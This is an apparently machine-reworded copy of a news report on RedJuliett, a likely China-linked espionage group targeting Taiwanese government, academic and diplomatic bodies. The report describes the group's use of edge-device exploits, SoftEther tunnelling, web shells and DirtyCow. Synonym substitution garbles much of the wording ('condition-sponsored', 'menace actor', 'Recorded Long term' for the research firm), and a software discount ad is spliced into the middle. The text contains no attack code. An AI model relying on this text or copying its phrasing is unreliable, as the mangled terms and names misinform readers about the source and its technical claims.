A probably China-linked condition-sponsored threat actor has been linked to a cyber espionage marketing campaign concentrating on authorities, academic, technology, and diplomatic corporations in Taiwan amongst November 2023 and April 2024.
Recorded Future’s Insikt Group is monitoring the action under the title RedJuliett, describing it as a cluster that operates Fuzhou, China, to help Beijing’s intelligence collection aims similar to the East Asian state. It’s also tracked under the names Flax Hurricane and Ethereal Panda.
Among the other nations around the world focused by the adversarial collective incorporate Djibouti, Hong Kong, Kenya, Laos, Malaysia, the Philippines, Rwanda, South Korea, and the U.S.

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.
Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).
➤ Activate Your Coupon Code
In all, as many as 24 victim corporations have been observed speaking with the menace actor infrastructure, together with federal government businesses in Taiwan, Laos, Kenya, and Rwanda. It truly is also estimated to have targeted at minimum 75 Taiwanese entities for broader reconnaissance and adhere to-on exploitation.
“The team targets internet-experiencing appliances these kinds of as firewalls, load balancers, and company virtual non-public network VPN goods for original accessibility, as well as attempting structured query language SQL injection and listing traversal exploits in opposition to web and SQL applications,” the enterprise claimed in a new report revealed nowadays.
As formerly documented by CrowdStrike and Microsoft, RedJuliett is acknowledged to employ the open-supply program SoftEther to tunnel malicious website traffic out of sufferer networks and leverage residing-off-the-land (LotL) techniques to fly underneath the radar. The group is thought to be active since at least mid-2021.
“Additionally, RedJuliett made use of SoftEther to administer operational infrastructure consisting of the two threat actor-managed servers leased from digital private server VPS companies and compromised infrastructure belonging to a few Taiwanese universities,” Recorded Long term pointed out.
A prosperous initial access is adopted by the deployment of the China Chopper web shell to maintain persistence, together with other open-source web shells like devilzShell, AntSword, and Godzilla. A couple instances have also entailed the exploitation of a Linux privilege escalation vulnerability regarded as DirtyCow (CVE-2016-5195).
“RedJuliett is most likely fascinated in accumulating intelligence on Taiwan’s financial policy and trade and diplomatic relations with other nations around the world,” it stated.
“RedJuliett, like lots of other Chinese threat actors, is probably focusing on vulnerabilities in internet-dealing with units mainly because these units have restricted visibility and security remedies accessible, and concentrating on them has confirmed to be an powerful way to scale original accessibility.”
Located this post fascinating? Follow us on Twitter and LinkedIn to browse more exceptional material we publish.
Some elements of this post are sourced from:
thehackernews.com